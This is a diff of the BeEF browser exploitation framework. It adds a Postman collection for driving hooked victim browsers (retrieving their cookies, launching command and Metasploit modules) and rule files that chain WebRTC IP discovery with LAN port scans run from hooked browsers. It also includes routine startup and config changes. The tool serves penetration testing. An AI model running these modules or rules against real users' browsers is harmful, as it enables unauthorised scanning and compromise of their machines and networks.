-    Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
+    Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
    Browser Exploitation Framework (BeEF) - http://beefproject.com
    See the file 'doc/COPYING' for copying permission

@@ -28,21 +28,19 @@ __Bugs:__ https://github.com/beefproject/beef/issues

 __Security Bugs:__ security@beefproject.com

-__IRC:__ ircs://irc.freenode.net/beefproject
-
-__Twitter:__ @beefproject
+__Twitter:__ [@beefproject](https://twitter.com/beefproject)

+__Discord:__ https://discord.gg/ugmKmHarKc

 Requirements
 ------------

 * Operating System: Mac OSX 10.5.0 or higher / modern Linux. Note: Windows is not supported.
-* [Ruby](http://ruby-lang.org): 2.4 or newer
+* [Ruby](https://www.ruby-lang.org): 2.7 or newer
 * [SQLite](http://sqlite.org): 3.x
-* [Node.js](https://nodejs.org): 6 or newer
+* [Node.js](https://nodejs.org): 10 or newer
 * The gems listed in the Gemfile: https://github.com/beefproject/beef/blob/master/Gemfile
-* Selenium is required on OSX: brew install selenium-server-standalone (See https://github.com/shvets/selenium)
-
+* Selenium is required on OSX: `brew install selenium-server-standalone` (See https://github.com/shvets/selenium)

 Quick Start
 -----------
@@ -55,13 +53,19 @@ The `install` script installs the required operating system packages and all the
 $ ./install
 ```

-For full installation details, please refer to [INSTALL.txt](https://github.com/beefproject/beef/blob/master/INSTALL.txt).
-
-We also have an [Installation](https://github.com/beefproject/beef/wiki/Installation) page on the wiki.
+For full installation details, please refer to [INSTALL.txt](https://github.com/beefproject/beef/blob/master/INSTALL.txt) or the [Installation](https://github.com/beefproject/beef/wiki/Installation) page on the wiki.

 Upon successful installation, be sure to read the [Configuration](https://github.com/beefproject/beef/wiki/Configuration) page on the wiki for important details on configuring and securing BeEF.


+Documentation
+---
+
+* [User Guide](https://github.com/beefproject/beef/wiki#user-guide)
+* [Frequently Asked Questions](https://github.com/beefproject/beef/wiki/FAQ)
+* [JSdocs](https://beefproject.github.io/beef/index.html)
+
+
 Usage
 -----

--- a/RESTful-API.postman_collection.json
+++ b/RESTful-API.postman_collection.json
@@ -0,0 +1,567 @@
+{
+	"info": {
+		"_postman_id": "3b47c3ff-c03f-446c-8edb-cacaab481425",
+		"name": "RESTful API",
+		"schema": "https://schema.getpostman.com/json/collection/v2.1.0/collection.json"
+	},
+	"item": [
+		{
+			"name": "Authentication",
+			"event": [
+				{
+					"listen": "test",
+					"script": {
+						"id": "8e1a5f48-1d41-469d-a153-6cd5ee751912",
+						"exec": [
+							"var jsonData = JSON.parse(responseBody);",
+							"pm.environment.set(\"token\", jsonData.token);"
+						],
+						"type": "text/javascript"
+					}
+				}
+			],
+			"request": {
+				"method": "POST",
+				"header": [
+					{
+						"key": "Content-Type",
+						"name": "Content-Type",
+						"value": "application/json",
+						"type": "text"
+					}
+				],
+				"body": {
+					"mode": "raw",
+					"raw": "{\n\t\"username\": \"{{username}}\",\n\t\"password\": \"{{password}}\"\n\t\n}",
+					"options": {
+						"raw": {
+							"language": "json"
+						}
+					}
+				},
+				"url": {
+					"raw": "http://{{hostname}}:3000/api/admin/login",
+					"protocol": "http",
+					"host": [
+						"{{hostname}}"
+					],
+					"port": "3000",
+					"path": [
+						"api",
+						"admin",
+						"login"
+					]
+				},
+				"description": "In order to use the API, a token parameter must always be added to requests, otherwise a 401 error (Not Authorized) is returned.\n\nA new pseudo-random token is generated each time BeEF starts, using BeEF::Core::Crypto::api_token. The token is added to the BeEF::Configuration object.\n\nWhen BeEF starts the token is printed to the console. It should look something like:\n\n[16:02:47][*] RESTful API key: 320f3cf4da7bf0df7566a517c5db796e73a23f47\nGrabbing the Token from BeEF's API\n\nYou can issue a POST request to /api/admin/login using the BeEF credentials you have set in the main config.yaml file. This request will return the token in the response. You can parse the JSON and use it for your next requests requiring authentication."
+			},
+			"response": []
+		},
+		{
+			"name": "Get All Hooked Browsers",
+			"request": {
+				"method": "GET",
+				"header": [],
+				"url": {
+					"raw": "http://{{hostname}}:3000/api/hooks?token={{token}}",
+					"protocol": "http",
+					"host": [
+						"{{hostname}}"
+					],
+					"port": "3000",
+					"path": [
+						"api",
+						"hooks"
+					],
+					"query": [
+						{
+							"key": "token",
+							"value": "{{token}}"
+						}
+					]
+				},
+				"description": "Provides information (browser and OS version, cookies, enabled plugins, etc) about all hooked browsers (both online and offline)."
+			},
+			"response": []
+		},
+		{
+			"name": "Get Specific Hooked Browser",
+			"request": {
+				"method": "GET",
+				"header": [],
+				"url": {
+					"raw": "http://{{hostname}}:3000/api/hooks/{{session}}?token={{token}}",
+					"protocol": "http",
+					"host": [
+						"{{hostname}}"
+					],
+					"port": "3000",
+					"path": [
+						"api",
+						"hooks",
+						"{{session}}"
+					],
+					"query": [
+						{
+							"key": "token",
+							"value": "{{token}}"
+						}
+					]
+				},
+				"description": "\n    Provides information (browser and OS version, cookies, enabled plugins, etc) about a specific hooked browser.\n"
+			},
+			"response": []
+		},
+		{
+			"name": "Get All Hooked Browsers Logs",
+			"request": {
+				"method": "GET",
+				"header": [],
+				"url": {
+					"raw": "http://{{hostname}}:3000/api/logs?token={{token}}",
+					"protocol": "http",
+					"host": [
+						"{{hostname}}"
+					],
+					"port": "3000",
+					"path": [
+						"api",
+						"logs"
+					],
+					"query": [
+						{
+							"key": "token",
+							"value": "{{token}}"
+						}
+					]
+				},
+				"description": "The logs handler gives information about all hooked browser's logs, both global and relative."
+			},
+			"response": []
+		},
+		{
+			"name": "Get Specific Hooked Browsers Logs",
+			"request": {
+				"method": "GET",
+				"header": [],
+				"url": {
+					"raw": "http://{{hostname}}:3000/api/logs/{{session}}?token={{token}}",
+					"protocol": "http",
+					"host": [
+						"{{hostname}}"
+					],
+					"port": "3000",
+					"path": [
+						"api",
+						"logs",
+						"{{session}}"
+					],
+					"query": [
+						{
+							"key": "token",
+							"value": "{{token}}"
+						}
+					]
+				},
+				"description": " The logs handler gives information about a specified hooked browser's logs.\n"
+			},
+			"response": []
+		},
+		{
+			"name": "List All Command Modules",
+			"request": {
+				"method": "GET",
+				"header": [],
+				"url": {
+					"raw": "http://{{hostname}}:3000/api/modules?token={{token}}",
+					"protocol": "http",
+					"host": [
+						"{{hostname}}"
+					],
+					"port": "3000",
+					"path": [
+						"api",
+						"modules"
+					],
+					"query": [
+						{
+							"key": "token",
+							"value": "{{token}}"
+						}
+					]
+				},
+				"description": "List all available BeEF command modules."
+			},
+			"response": []
+		},
+		{
+			"name": "Get Information on Specific Module",
+			"request": {
+				"method": "GET",
+				"header": [],
+				"url": {
+					"raw": "http://{{hostname}}:3000/api/modules/{{module_id}}?token={{token}}",
+					"protocol": "http",
+					"host": [
+						"{{hostname}}"
+					],
+					"port": "3000",
+					"path": [
+						"api",
+						"modules",
+						"{{module_id}}"
+					],
+					"query": [
+						{
+							"key": "token",
+							"value": "{{token}}"
+						}
+					]
+				},
+				"description": "Get detailed information about a specific BeEF command module.\n"
+			},
+			"response": []
+		},
+		{
+			"name": "Launch Command Module on a Specific Browser",
+			"request": {
+				"method": "POST",
+				"header": [
+					{
+						"key": "Content-Type",
+						"name": "Content-Type",
+						"value": "application/json",
+						"type": "text"
+					}
+				],
+				"body": {
+					"mode": "raw",
+					"raw": "",
+					"options": {
+						"raw": {
+							"language": "json"
+						}
+					}
+				},
+				"url": {
+					"raw": "http://{{hostname}}:3000/api/modules/{{session}}/{{module_id}}?token={{token}}",
+					"protocol": "http",
+					"host": [
+						"{{hostname}}"
+					],
+					"port": "3000",
+					"path": [
+						"api",
+						"modules",
+						"{{session}}",
+						"{{module_id}}"
+					],
+					"query": [
+						{
+							"key": "token",
+							"value": "{{token}}"
+						}
+					]
+				},
+				"description": "Launch a specific BeEF command module on a given hooked browser.\n"
+			},
+			"response": []
+		},
+		{
+			"name": "Return Information About Previously Executed Module",
+			"protocolProfileBehavior": {
+				"disableBodyPruning": true
+			},
+			"request": {
+				"method": "GET",
+				"header": [
+					{
+						"key": "Content-Type",
+						"name": "Content-Type",
+						"value": "application/json",
+						"type": "text"
+					}
+				],
+				"body": {
+					"mode": "raw",
+					"raw": "",
+					"options": {
+						"raw": {
+							"language": "json"
+						}
+					}
+				},
+				"url": {
+					"raw": "http://{{hostname}}:3000/api/modules/{{session}}/{{module_id}}/{{cmd_id}}?token={{token}}",
+					"protocol": "http",
+					"host": [
+						"{{hostname}}"
+					],
+					"port": "3000",
+					"path": [
+						"api",
+						"modules",
+						"{{session}}",
+						"{{module_id}}",
+						"{{cmd_id}}"
+					],
+					"query": [
+						{
+							"key": "token",
+							"value": "{{token}}"
+						}
+					]
+				},
+				"description": "Returns information about a specific previously launched BeEF command module.\n"
+			},
+			"response": []
+		},
+		{
+			"name": "Send a Metasploit Module",
+			"request": {
+				"method": "POST",
+				"header": [],
+				"url": {
+					"raw": "http://{{hostname}}:3000/api/modules/{{session}}/{{module_id}}?token={{token}}",
+					"protocol": "http",
+					"host": [
+						"{{hostname}}"
+					],
+					"port": "3000",
+					"path": [
+						"api",
+						"modules",
+						"{{session}}",
+						"{{module_id}}"
+					],
+					"query": [
+						{
+							"key": "token",
+							"value": "{{token}}"
+						}
+					]
+				},
+				"description": "Launch a specific Metasploit module on a given hooked browser\n"
+			},
+			"response": []
+		},
+		{
+			"name": " Send a Module to Multiple Hooked Browsers",
+			"request": {
+				"method": "POST",
+				"header": [
+					{
+						"key": "Content-Type",
+						"name": "Content-Type",
+						"value": "application/json",
+						"type": "text"
+					}
+				],
+				"body": {
+					"mode": "raw",
+					"raw": "",
+					"options": {
+						"raw": {
+							"language": "json"
+						}
+					}
+				},
+				"url": {
+					"raw": "http://{{hostname}}:3000/api/modules/multi_browser?token={{token}}",
+					"protocol": "http",
+					"host": [
+						"{{hostname}}"
+					],
+					"port": "3000",
+					"path": [
+						"api",
+						"modules",
+						"multi_browser"
+					],
+					"query": [
+						{
+							"key": "token",
+							"value": "{{token}}"
+						}
+					]
+				},
+				"description": "Fire a new command module to multiple hooked browsers. Returns the command IDs of the launched module, or 0 if firing got issues."
+			},
+			"response": []
+		},
+		{
+			"name": " Send Multiple Modules to a Single Hooked Browser",
+			"request": {
+				"method": "POST",
+				"header": [
+					{
+						"key": "Content-Type",
+						"name": "Content-Type",
+						"value": "application/json",
+						"type": "text"
+					}
+				],
+				"body": {
+					"mode": "raw",
+					"raw": "",
+					"options": {
+						"raw": {
+							"language": "json"
+						}
+					}
+				},
+				"url": {
+					"raw": "http://{{hostname}}:3000/api/modules/multi_module?token={{token}}",
+					"protocol": "http",
+					"host": [
+						"{{hostname}}"
+					],
+					"port": "3000",
+					"path": [
+						"api",
+						"modules",
+						"multi_module"
+					],
+					"query": [
+						{
+							"key": "token",
+							"value": "{{token}}"
+						}
+					]
+				},
+				"description": "Fire multiple command modules to a single hooked browser. Returns the command IDs of the launched modules, or 0 if firing got issues."
+			},
+			"response": []
+		},
+		{
+			"name": "List the DNS ruleset",
+			"request": {
+				"method": "GET",
+				"header": [],
+				"url": {
+					"raw": "http://{{hostname}}:3000/api/dns/ruleset?token={{token}}",
+					"protocol": "http",
+					"host": [
+						"{{hostname}}"
+					],
+					"port": "3000",
+					"path": [
+						"api",
+						"dns",
+						"ruleset"
+					],
+					"query": [
+						{
+							"key": "token",
+							"value": "{{token}}"
+						}
+					]
+				},
+				"description": "Returns the current set of DNS rules.\n"
+			},
+			"response": []
+		},
+		{
+			"name": "List a Specific DNS Rule",
+			"request": {
+				"method": "GET",
+				"header": [],
+				"url": {
+					"raw": "http://{{hostname}}:3000/api/dns/rule/{{dnsrule_id}}?token={{token}}",
+					"protocol": "http",
+					"host": [
+						"{{hostname}}"
+					],
+					"port": "3000",
+					"path": [
+						"api",
+						"dns",
+						"rule",
+						"{{dnsrule_id}}"
+					],
+					"query": [
+						{
+							"key": "token",
+							"value": "{{token}}"
+						}
+					]
+				},
+				"description": "Returns an individual DNS rule given its unique id.\n"
+			},
+			"response": []
+		},
+		{
+			"name": "Add a New DNS Rule",
+			"request": {
+				"method": "POST",
+				"header": [
+					{
+						"key": "Content-Type",
+						"name": "Content-Type",
+						"value": "application/json",
+						"type": "text"
+					}
+				],
+				"body": {
+					"mode": "raw",
+					"raw": "",
+					"options": {
+						"raw": {
+							"language": "json"
+						}
+					}
+				},
+				"url": {
+					"raw": "http://{{hostname}}:3000/api/dns/rule?token={{token}}",
+					"protocol": "http",
+					"host": [
+						"{{hostname}}"
+					],
+					"port": "3000",
+					"path": [
+						"api",
+						"dns",
+						"rule"
+					],
+					"query": [
+						{
+							"key": "token",
+							"value": "{{token}}"
+						}
+					]
+				},
+				"description": "Adds a new DNS rule or \"resource record\". Does nothing if rule is already present.\n"
+			},
+			"response": []
+		},
+		{
+			"name": "Remove an Existing DNS Rule",
+			"request": {
+				"method": "DELETE",
+				"header": [],
+				"url": {
+					"raw": "http://{{hostname}}:3000/api/dns/rule/{{dnsrule_id}}?token={{token}}",
+					"protocol": "http",
+					"host": [
+						"{{hostname}}"
+					],
+					"port": "3000",
+					"path": [
+						"api",
+						"dns",
+						"rule",
+						"{{dnsrule_id}}"
+					],
+					"query": [
+						{
+							"key": "token",
+							"value": "{{token}}"
+						}
+					]
+				},
+				"description": "Removes an individual DNS rule with a specified unique ID.\n"
+			},
+			"response": []
+		}
+	],
+	"protocolProfileBehavior": {}
+}
--- a/22
+++ b/22
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -18,10 +18,26 @@ end

 ## RSPEC
 require 'rspec/core/rake_task'
-RSpec::Core::RakeTask.new(:spec)

+RSpec::Core::RakeTask.new(:spec) do |task|
+  task.rspec_opts = ['--tag ~run_on_browserstack']
+end

+RSpec::Core::RakeTask.new(:browserstack) do |task|
+  task.rspec_opts = ['--tag run_on_browserstack']
+end

+RSpec::Core::RakeTask.new(:bs) do |task|
+  configs = Dir["spec/support/browserstack/**/*.yml"]
+  configs.each do |config|
+    config = config.split('spec/support/browserstack')[1]
+    ENV['CONFIG_FILE'] = config
+    puts "\e[45m#{config.upcase}\e[0m"
+    task.rspec_opts = ['--tag run_on_browserstack']
+    Rake::Task['browserstack'].invoke
+    Rake::Task['browserstack'].reenable
+  end
+end

 ################################
 # SSL/TLS certificate
@@ -115,7 +131,7 @@ task :beef_start => 'beef' do
  test_pass = ENV['TEST_BEEF_PASS'] || 'bad_fred_no_access'

  # write a rake config file for beef
-  config = YAML.load(File.read('./config.yaml'))
+  config = YAML.safe_load(File.read('./config.yaml'))
  config['beef']['credentials']['user'] = test_user
  config['beef']['credentials']['passwd'] = test_pass
  Dir.mkdir('tmp') unless Dir.exists?('tmp')
--- a/4
+++ b/4
@@ -1,7 +1,7 @@
 #
-# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

-0.4.7.4-alpha-pre
+0.5.4.0
--- a/_config.yml
+++ b/_config.yml
@@ -0,0 +1 @@
+theme: jekyll-theme-minimal
--- a/arerules/lan_port_scan.json
+++ b/arerules/lan_port_scan.json
@@ -0,0 +1,29 @@
+{"name": "LAN Port Scan",
+  "author": "aburro & aussieklutz",
+  "browser": "ALL",
+  "browser_version": "ALL",
+  "os": "ALL",
+  "os_version": "ALL",
+  "modules": [
+    {"name": "get_internal_ip_webrtc",
+      "condition": null,
+      "code": null,
+      "options": {}
+    },
+    {"name": "port_scanner",
+      "condition": "status==1",
+      "code": "var s=get_internal_ip_webrtc_mod_output.split('.');var start = s[0]+'.'+s[1]+'.'+s[2]+'.'+s[3]; var mod_input = start;",
+      "options": {
+        "ipHost":"<<mod_input>>",
+        "ports":"80,8080",
+        "closetimeout":"1100",
+        "opentimeout":"2500",
+        "delay":"600",
+        "debug":"false"
+      }
+    }
+  ],
+  "execution_order": [0, 1],
+  "execution_delay": [0, 0],
+  "chain_mode": "nested-forward"
+}
--- a/arerules/lan_sw_port_scan.json
+++ b/arerules/lan_sw_port_scan.json
@@ -0,0 +1,25 @@
+{"name": "LAN SW Port Scan",
+  "author": "aburro & aussieklutz",
+  "browser": "ALL",
+  "browser_version": "ALL",
+  "os": "ALL",
+  "os_version": "ALL",
+  "modules": [
+    {"name": "get_internal_ip_webrtc",
+      "condition": null,
+      "code": null,
+      "options": {}
+    },
+    {"name": "sw_port_scanner",
+      "condition": "status==1",
+      "code": "var s=get_internal_ip_webrtc_mod_output.split('.');var start = s[0]+'.'+s[1]+'.'+s[2]+'.'+s[3]; var mod_input = start;",
+      "options": {
+        "ipHost":"192.168.1.10",
+        "ports":"80,8080"
+      }
+    }
+  ],
+  "execution_order": [0, 1],
+  "execution_delay": [0, 0],
+  "chain_mode": "nested-forward"
+}
--- a/68
+++ b/68
@@ -1,7 +1,7 @@
 #!/usr/bin/env ruby

 #
-# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -12,11 +12,12 @@
 $VERBOSE = nil

 #
-# @note Version check to ensure BeEF is running Ruby 2.4+
+# @note Version check to ensure BeEF is running Ruby 2.7+
 #
-if RUBY_VERSION < '2.4'
+min_ruby_version = '2.7'
+if RUBY_VERSION < min_ruby_version
  puts
-  puts "Ruby version #{RUBY_VERSION} is no longer supported. Please upgrade to Ruby version 2.4 or later."
+  puts "Ruby version #{RUBY_VERSION} is no longer supported. Please upgrade to Ruby version #{min_ruby_version} or later."
  puts
  exit 1
 end
@@ -42,6 +43,28 @@ $home_dir = File.expand_path("#{Dir.home}/.beef/", __FILE__).freeze
 # @note Require core loader
 #
 require 'core/loader'
+require 'timeout'
+
+#
+# @note Ask user if they would like to update beef
+#
+if File.exist?("#{$root_dir}git") && BeEF::Core::Console::CommandLine.parse[:update_disabled] == false
+  if BeEF::Core::Console::CommandLine.parse[:update_auto] == true
+    print 'Checking latest BeEF repository and updating'
+    `git pull && bundle`
+  elsif `git rev-parse master` != `git rev-parse origin/master`
+    begin
+      Timeout.timeout(5) do
+        puts '-- BeEF Update Available --'
+        print 'Would you like to update to lastest version? y/n: '
+        response = gets
+        `git pull && bundle` if response&.strip == 'y'
+      end
+    rescue Timeout::Error
+      puts "\nUpdate Skipped with input timeout"
+    end
+  end
+end

 #
 # @note Create ~/.beef/
@@ -109,13 +132,13 @@ end
 #
 # @note Validate beef.http.public and beef.http.public_port
 #
-unless config.get('beef.http.public').to_s.eql?('') || BeEF::Filters.is_valid_hostname?(config.get('beef.http.public'))
-  print_error "ERROR: Invalid public hostname: #{config.get('beef.http.public')}"
+unless config.get('beef.http.public.host').to_s.eql?('') || BeEF::Filters.is_valid_hostname?(config.get('beef.http.public.host'))
+  print_error "ERROR: Invalid public hostname: #{config.get('beef.http.public.host')}"
  exit 1
 end

-unless config.get('beef.http.public_port').to_s.eql?('') || BeEF::Filters.is_valid_port?(config.get('beef.http.public_port'))
-  print_error "ERROR: Invalid public port: #{config.get('beef.http.public_port')}"
+unless config.get('beef.http.public.port').to_s.eql?('') || BeEF::Filters.is_valid_port?(config.get('beef.http.public.port'))
+  print_error "ERROR: Invalid public port: #{config.get('beef.http.public.port')}"
  exit 1
 end

@@ -161,18 +184,29 @@ db_file = config.get('beef.database.file')
 # @note Resets the database if the -x flag was passed
 if BeEF::Core::Console::CommandLine.parse[:resetdb]
  print_info 'Resetting the database for BeEF.'
-  File.delete(db_file) if File.exists?(db_file)
+  begin
+    File.delete(db_file) if File.exists?(db_file)
+  rescue => e
+    print_error("Could not remove '#{db_file}' database file: #{e.message}")
+    exit(1)
+  end
 end
+
 # Connect to DB
 ActiveRecord::Base.logger = nil
 OTR::ActiveRecord.migrations_paths = [File.join('core', 'main', 'ar-migrations')]
 OTR::ActiveRecord.configure_from_hash!(adapter:'sqlite3', database:db_file)
+# otr-activerecord require you to manually establish the connection with the following line
+#Also a check to confirm that the correct Gem version is installed to require it, likely easier for old systems.
+if Gem.loaded_specs['otr-activerecord'].version > Gem::Version.create('1.4.2')
+  OTR::ActiveRecord.establish_connection!
+end
+
 # Migrate (if required)
 context = ActiveRecord::Migration.new.migration_context
 if context.needs_migration?
  ActiveRecord::Migrator.new(:up, context.migrations, context.schema_migration).migrate
 end
-
 #
 # @note Extensions may take a moment to load, thus we print out a please wait message
 #
@@ -181,7 +215,12 @@ print_info 'BeEF is loading. Wait a few seconds...'
 #
 # @note Execute migration procedure, checks for new modules
 #
-BeEF::Core::Migration.instance.update_db!
+begin
+  BeEF::Core::Migration.instance.update_db!
+rescue => e
+  print_error("Could not update '#{db_file}' database file: #{e.message}")
+  exit(1)
+end

 #
 # @note Create HTTP Server and prepare it to run
@@ -189,6 +228,13 @@ BeEF::Core::Migration.instance.update_db!
 http_hook_server = BeEF::Core::Server.instance
 http_hook_server.prepare

+begin
+  BeEF::Core::Logger.instance.register('System', 'BeEF server started')
+rescue => e
+  print_error("Database connection failed: #{e.message}")
+  exit(1)
+end
+
 #
 # @note Prints information back to the user before running the server
 #
--- a/conf.json
+++ b/conf.json
@@ -0,0 +1,16 @@
+{
+    "source": {
+        "include": ["./core/main/client"],
+        "includePattern": ".js$"
+    },
+    "plugins": [
+        "plugins/markdown"
+    ],
+    "opts": {
+        "encoding": "utf8",
+        "readme": "./README.md",
+        "destination": "docs/",
+        "recurse": true,
+        "verbose": true
+    }
+}
--- a/config.yaml
+++ b/config.yaml
@@ -1,12 +1,12 @@
 #
-# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 # BeEF Configuration file

 beef:
-    version: '0.4.7.4-alpha-pre'
+    version: '0.5.4.0'
    # More verbose messages (server-side)
    debug: false
    # More verbose messages (client-side)
@@ -27,10 +27,12 @@ beef:
        # subnet of IP addresses that can connect to the admin UI
        #permitted_ui_subnet: ["127.0.0.1/32", "::1/128"]
        permitted_ui_subnet: ["0.0.0.0/0", "::/0"]
+        # subnet of IP addresses that cannot be hooked by the framework
+        excluded_hooking_subnet: []
        # slow API calls to 1 every  api_attempt_delay  seconds
        api_attempt_delay: "0.05"

-    # HTTP server
+    # HTTP server 
    http:
        debug: false #Thin::Logging.debug, very verbose. Prints also full exception stack trace.
        host: "0.0.0.0"
@@ -45,14 +47,21 @@ beef:

        # Host Name / Domain Name
        # If you want BeEF to be accessible via hostname or domain name (ie, DynDNS),
-        #   set the public hostname below:
-        #public: ""      # public hostname/IP address
+        # These settings will be used to create a public facing URL
+        # This public facing URL will be used for all hook related calls
+        # set the public setting below:
+        # public:
+        #     host: "" # public hostname/IP address
+        #     port: "" # public port will default to 80 if no https 443 if https 
+                      # and local if not set but there is a public host
+        #     https: false # true/false

        # Reverse Proxy / NAT
        # If you want BeEF to be accessible behind a reverse proxy or NAT,
        #   set both the publicly accessible hostname/IP address and port below:
-        #public: ""      # public hostname/IP address
-        #public_port: "" # public port (experimental)
+        # NOTE: Allowing the reverse proxy will enable a vulnerability where the ui/panel can be spoofed
+        #   by altering the X-FORWARDED-FOR ip address in the request header.
+        allow_reverse_proxy: false

        # Hook
        hook_file: "/hook.js"
@@ -72,7 +81,7 @@ beef:
            # NOTE: works only on HTTPS domains and with HTTPS support enabled in BeEF
            secure: true
            secure_port: 61986 # WSSecure
-            ws_poll_timeout: 1000 # poll BeEF every second
+            ws_poll_timeout: 5000 # poll BeEF every x second, this affects how often the browser can have a command execute on it
            ws_connect_timeout: 500 # useful to help fingerprinting finish before establishing the WS channel

        # Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header)
@@ -84,6 +93,8 @@ beef:
        # Experimental HTTPS support for the hook / admin / all other Thin managed web services
        https:
            enable: false
+            # Enabled this config setting if you're external facing uri is using https
+            public_enabled: false
            # In production environments, be sure to use a valid certificate signed for the value
            # used in beef.http.public (the domain name of the server where you run BeEF)
            key: "beef_key.pem"
@@ -109,10 +120,10 @@ beef:
    dns_hostname_lookup: false

    # IP Geolocation
-    # NOTE: requires MaxMind database. Run ./updated-geoipdb to install.
    geoip:
        enable: true
-        database: '/opt/GeoIP/GeoLite2-City.mmdb'
+        # GeoLite2 City database created by MaxMind, available from https://www.maxmind.com
+        database: '/usr/share/GeoIP/GeoLite2-City.mmdb'

    # Integration with PhishingFrenzy
    # If enabled BeEF will try to get the UID parameter value from the hooked URI, as this is used by PhishingFrenzy
--- a/core/api.rb
+++ b/core/api.rb
@@ -1,12 +1,11 @@
 #
-# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

 module BeEF
  module API
-
    #
    # Registrar class to handle all registered timed API calls
    #
@@ -24,26 +23,26 @@ module BeEF
      # Register timed API calls to an owner
      #
      # @param [Class] owner the owner of the API hook
-      # @param [Class] c the API class the owner would like to hook into
+      # @param [Class] clss the API class the owner would like to hook into
      # @param [String] method the method of the class the owner would like to execute
      # @param [Array] params an array of parameters that need to be matched before the owner will be called
      #
-      def register(owner, c, method, params = [])
-        unless verify_api_path(c, method)
-          print_error "API Registrar: Attempted to register non-existant API method #{c} :#{method}"
+      def register(owner, clss, method, params = [])
+        unless verify_api_path(clss, method)
+          print_error "API Registrar: Attempted to register non-existant API method #{clss} :#{method}"
          return
        end

-        if registered?(owner, c, method, params)
-          print_debug "API Registrar: Attempting to re-register API call #{c} :#{method}"
+        if registered?(owner, clss, method, params)
+          print_debug "API Registrar: Attempting to re-register API call #{clss} :#{method}"
          return
        end

        id = @count
        @registry << {
-          'id'     => id,
-          'owner'  => owner,
-          'class'  => c,
+          'id' => id,
+          'owner' => owner,
+          'class' => clss,
          'method' => method,
          'params' => params
        }
@@ -56,18 +55,19 @@ module BeEF
      # Tests whether the owner is registered for an API hook
      #
      # @param [Class] owner the owner of the API hook
-      # @param [Class] c the API class
+      # @param [Class] clss the API class
      # @param [String] method the method of the class
      # @param [Array] params an array of parameters that need to be matched
      #
      # @return [Boolean] whether or not the owner is registered
      #
-      def registered?(owner, c, method, params = [])
+      def registered?(owner, clss, method, params = [])
        @registry.each do |r|
          next unless r['owner'] == owner
-          next unless r['class'] == c
+          next unless r['class'] == clss
          next unless r['method'] == method
          next unless is_matched_params? r, params
+
          return true
        end
        false
@@ -76,17 +76,18 @@ module BeEF
      #
      # Match a timed API call to determine if an API.fire() is required
      #
-      # @param [Class] c the target API class
+      # @param [Class] clss the target API class
      # @param [String] method the method of the target API class
      # @param [Array] params an array of parameters that need to be matched
      #
      # @return [Boolean] whether or not the arguments match an entry in the API registry
      #
-      def matched?(c, method, params = [])
+      def matched?(clss, method, params = [])
        @registry.each do |r|
-          next unless r['class'] == c
+          next unless r['class'] == clss
          next unless r['method'] == method
          next unless is_matched_params? r, params
+
          return true
        end
        false
@@ -98,24 +99,25 @@ module BeEF
      # @param [Integer] id the ID of the API hook
      #
      def unregister(id)
-        @registry.delete_if {|r| r['id'] == id }
+        @registry.delete_if { |r| r['id'] == id }
      end

      #
      # Retrieves all the owners and ID's of an API hook
-      # @param [Class] c the target API class
+      # @param [Class] clss the target API class
      # @param [String] method the method of the target API class
      # @param [Array] params an array of parameters that need to be matched
      #
      # @return [Array] an array of hashes consisting of two keys :owner and :id
      #
-      def get_owners(c, method, params = [])
+      def get_owners(clss, method, params = [])
        owners = []
        @registry.each do |r|
-          next unless r['class'] == c
+          next unless r['class'] == clss
          next unless r['method'] == method
          next unless is_matched_params? r, params
-          owners << { :owner => r['owner'], :id => r['id'] }
+
+          owners << { owner: r['owner'], id: r['id'] }
        end
        owners
      end
@@ -126,23 +128,23 @@ module BeEF
      #
      # @note This is a security precaution
      #
-      # @param [Class] c the target API class to verify
-      # @param [String] m the target method to verify
+      # @param [Class] clss the target API class to verify
+      # @param [String] mthd the target method to verify
      #
-      def verify_api_path(c, m)
-        (c.const_defined?('API_PATHS') && c.const_get('API_PATHS').key?(m))
+      def verify_api_path(clss, mthd)
+        (clss.const_defined?('API_PATHS') && clss.const_get('API_PATHS').key?(mthd))
      end

      #
      # Retrieves the registered symbol reference for an API hook
      #
-      # @param [Class] c the target API class to verify
-      # @param [String] m the target method to verify
+      # @param [Class] clss the target API class to verify
+      # @param [String] mthd the target method to verify
      #
      # @return [Symbol] the API path
      #
-      def get_api_path(c, m)
-        verify_api_path(c, m) ? c.const_get('API_PATHS')[m] : nil
+      def get_api_path(clss, mthd)
+        verify_api_path(clss, mthd) ? clss.const_get('API_PATHS')[mthd] : nil
      end

      #
@@ -171,36 +173,32 @@ module BeEF
      #
      # Fires all owners registered to this API hook
      #
-      # @param [Class] c the target API class
-      # @param [String] m the target API method
+      # @param [Class] clss the target API class
+      # @param [String] mthd the target API method
      # @param [Array] *args parameters passed for the API call
      #
      # @return [Hash, NilClass] returns either a Hash of :api_id and :data
      #         if the owners return data, otherwise NilClass
      #
-      def fire(c, m, *args)
-        mods = get_owners(c, m, args)
+      def fire(clss, mthd, *args)
+        mods = get_owners(clss, mthd, args)
        return nil unless mods.length.positive?

-        unless verify_api_path(c, m) && c.ancestors[0].to_s > 'BeEF::API'
-          print_error "API Path not defined for Class: #{c} method:#{method}"
+        unless verify_api_path(clss, mthd) && clss.ancestors[0].to_s > 'BeEF::API'
+          print_error "API Path not defined for Class: #{clss} method: #{mthd}"
          return []
        end

